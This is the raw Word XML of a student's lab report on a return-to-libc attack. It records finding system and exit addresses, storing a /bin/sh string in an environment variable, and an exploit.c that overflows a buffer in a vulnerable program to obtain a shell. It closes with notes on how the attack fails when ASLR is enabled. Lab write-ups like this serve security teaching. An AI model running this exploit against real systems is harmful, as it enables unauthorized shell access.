    <w:p w14:paraId="4B07C962" w14:textId="77777777" w:rsidR="005C25F0" w:rsidRDefault="005C25F0" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C591BE" w14:textId="77777777" w:rsidR="005C25F0" w:rsidRDefault="005C25F0" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A74D109" w14:textId="77777777" w:rsidR="005C25F0" w:rsidRPr="006B08A1" w:rsidRDefault="005C25F0" w:rsidP="005C25F0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B08A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Return-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B08A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B08A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8403C9" w14:textId="77777777" w:rsidR="005C25F0" w:rsidRDefault="005C25F0" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099214BC" w14:textId="38F4F978" w:rsidR="005C25F0" w:rsidRPr="006B08A1" w:rsidRDefault="005C25F0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 xml:space="preserve">Task 1: Finding out the addresses of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62A887" w14:textId="572EC80A" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00BC6C65"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4893B31B" wp14:editId="38BD157A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>97155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2887980" cy="525780"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21130"/>
                <wp:lineTo x="21515" y="21130"/>
                <wp:lineTo x="2151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05 下午11.00.43 上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21430" w14:textId="371FB9FC" w:rsidR="00BC6C65" w:rsidRDefault="00BC6C65" w:rsidP="00BC6C65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置B</w:t>
      </w:r>
      <w:r>
        <w:t>UF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>SIZE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用命令查看system和exit的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D4F80" w14:textId="7DBB59F7" w:rsidR="00BC6C65" w:rsidRDefault="00BC6C65" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1FC813" w14:textId="77777777" w:rsidR="00C24C44" w:rsidRDefault="00C24C44" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4B744A" w14:textId="6A2942FF" w:rsidR="00C24C44" w:rsidRPr="006B08A1" w:rsidRDefault="00C24C44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>Task 2: Putting the shell string in the memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5EF1FC" w14:textId="44C337E1" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F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05E133EE" wp14:editId="1043821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915920" cy="636905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20674"/>
                <wp:lineTo x="21449" y="20674"/>
                <wp:lineTo x="21449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05 下午11.04.31 上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93099" w14:textId="7D6C74A1" w:rsidR="00C24C44" w:rsidRDefault="00C24C44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设置环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A1ED9" w14:textId="4A2260FA" w:rsidR="00C24C44" w:rsidRDefault="00C24C44" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36508782" w14:textId="63381BE8" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F878E1" w14:textId="701C2EAA" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left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6A12185" wp14:editId="185894CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2564130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2913380" cy="492760"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20876"/>
                <wp:lineTo x="21468" y="20876"/>
                <wp:lineTo x="21468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05 下午12.10.23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E2653" w14:textId="1D43A7B6" w:rsidR="00A065CB" w:rsidRDefault="00A065CB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找到保存有MYSHELL的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A13789" w14:textId="455F325F" w:rsidR="00A065CB" w:rsidRDefault="00A065CB" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DC6680" w14:textId="0DD4CF3C" w:rsidR="00A065CB" w:rsidRDefault="00A065CB" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325C22CC" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1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</w:p>
    <w:p w14:paraId="58BA136A" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1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</w:p>
    <w:p w14:paraId="71A34735" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1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</w:p>
    <w:p w14:paraId="46AB5977" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1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</w:p>
    <w:p w14:paraId="56550D59" w14:textId="636937E7" w:rsidR="001706C2" w:rsidRPr="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F7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5F6ECFD" wp14:editId="56927262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3040380" cy="807720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20887"/>
                <wp:lineTo x="21519" y="20887"/>
                <wp:lineTo x="21519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05 下午11.11.37 上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6C2"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>Task 3: Exploiting the buffer-overflow vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9544D4" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2F9069" w14:textId="301C3391" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EDE8CD" w14:textId="22B3B666" w:rsidR="001706C2" w:rsidRDefault="001706C2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和buffer的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08AF4E" w14:textId="3AAAE1B1" w:rsidR="001706C2" w:rsidRDefault="001706C2" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713A0AF7" w14:textId="784A9779" w:rsidR="00110E77" w:rsidRDefault="00110E77" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pP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地址和返回地址之间的内存地址的差为2</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A20147" w14:textId="5EED7BBA" w:rsidR="0006693D" w:rsidRDefault="0006693D" w:rsidP="00874F71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167B48AE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eploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12A0046B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1FD6421B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stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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79B2D95A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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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5D493FD7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string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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5E22F58B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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main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 {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E32B88C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buf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gramEnd"/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40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];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADED801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FILE *</w:t>
      </w:r>
      <w:proofErr w:type="spell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badfile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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52119606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badfile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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fopen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"./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"w"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7B5412B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*(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long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*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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buf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24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] =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0xb7e42da0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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91D20E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*(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long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*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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buf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28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] =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0xb7e369d0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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28344F36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*(</w:t>
      </w:r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long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*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0006693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buf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32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] =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0xbffffe1c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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF8236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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fwrite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buf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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sizeof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buf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),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badfile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);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C34948" w14:textId="77777777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06693D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fclose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badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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6DF05C7" w14:textId="41BEE61A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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return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06693D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; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ED8D18" w14:textId="4D2B01BA" w:rsidR="0006693D" w:rsidRPr="0006693D" w:rsidRDefault="0006693D" w:rsidP="000669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6693D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14:paraId="50517F19" w14:textId="282C74EA" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00110E77">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6278CA21" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00110E77">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4973078A" w14:textId="3D5604BD" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00110E77">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行后拿到Shell</w:t>
      </w:r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344BBE90" wp14:editId="120FA880">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2247900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3253105" cy="394970"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20836"/>
                <wp:lineTo x="21503" y="20836"/>
                <wp:lineTo x="2150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05 下午12.12.56 下午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5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3253105" cy="3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5B819" w14:textId="7BB414B6" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00110E77">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D10962" w14:textId="5E61BC15" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00110E77">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66795668" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00110E77">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F48500" w14:textId="6C0275D8" w:rsidR="00252ACE" w:rsidRDefault="006B08A1" w:rsidP="00252ACE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4C59B3DC" wp14:editId="356FDCC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425190" cy="644525"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21068"/>
                <wp:lineTo x="21504" y="21068"/>
                <wp:lineTo x="21504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05 下午10.21.57 上午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1" r="36501" b="11446"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3425190" cy="64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2ACE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去掉exit的地址，运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00252ACE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>retlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00252ACE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，出现错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F3CBE" w14:textId="63F5E942" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00252ACE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03EA4CDF" w14:textId="05FF0D2F" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00252ACE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当exit不存在时候退出shell时跳转到别的地址导致内存地址出现问题，出现错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A98723" w14:textId="1097A091" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00252ACE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F78B15" w14:textId="0DC426D0" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="00252ACE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03B0DCC1" wp14:editId="0BFA862C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2049780</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>209550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3434715" cy="337820"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20707"/>
                <wp:lineTo x="21444" y="20707"/>
                <wp:lineTo x="21444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05 下午12.16.22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93C6A0" w14:textId="3BCB9FF4" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00252ACE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将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rerlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改名，出现如下错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1637CA22" w14:textId="1E3DF4FC" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00252ACE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7552444E" w14:textId="77777777" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00252ACE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序名称长度改变之后，环境变量地址也会改变，导致了两个文件的</w:t>
      </w:r>
      <w:r>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不一致，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>传递的system参数会出现问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701348E3" w14:textId="77777777" w:rsidR="00252ACE" w:rsidRDefault="00252ACE" w:rsidP="00252ACE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE023AD" w14:textId="77777777" w:rsidR="005B461B" w:rsidRPr="006B08A1" w:rsidRDefault="005B461B" w:rsidP="00252AC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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B08A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Task 4: Turning on address randomization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B718FCF" w14:textId="77777777" w:rsidR="006B08A1" w:rsidRDefault="006B08A1" w:rsidP="005B461B"/>
    <w:p w14:paraId="1AFC19AC" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="00736985">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB2C5B">
        <w:t>kernel.randomize_va_spac</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为2，打开Ubuntu的地址随机化保护，运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rerlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，出现段错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54719EEB" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="00736985">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC1C84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2769B235" wp14:editId="2CDB3B71">
            <wp:extent cx="5312410" cy="558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897F" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="0073698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当打开</w:t>
      </w:r>
      <w:r>
        <w:t>ALSR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，/</w:t>
      </w:r>
      <w:r>
        <w:t>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的地址会改变</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A984BC" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="00736985">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC1C84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F66540E" wp14:editId="23B37E0C">
            <wp:extent cx="4310116" cy="13751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3233" cy="13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F198" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="0073698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 w:rsidRPr="00FB2C5B">
        <w:t>set disable-randomization of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f打开A</w:t>
      </w:r>
      <w:r>
        <w:t>LSR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，system和exit地址也会改变。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F223122" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="00736985">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC1C84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F7477C" wp14:editId="247E3192">
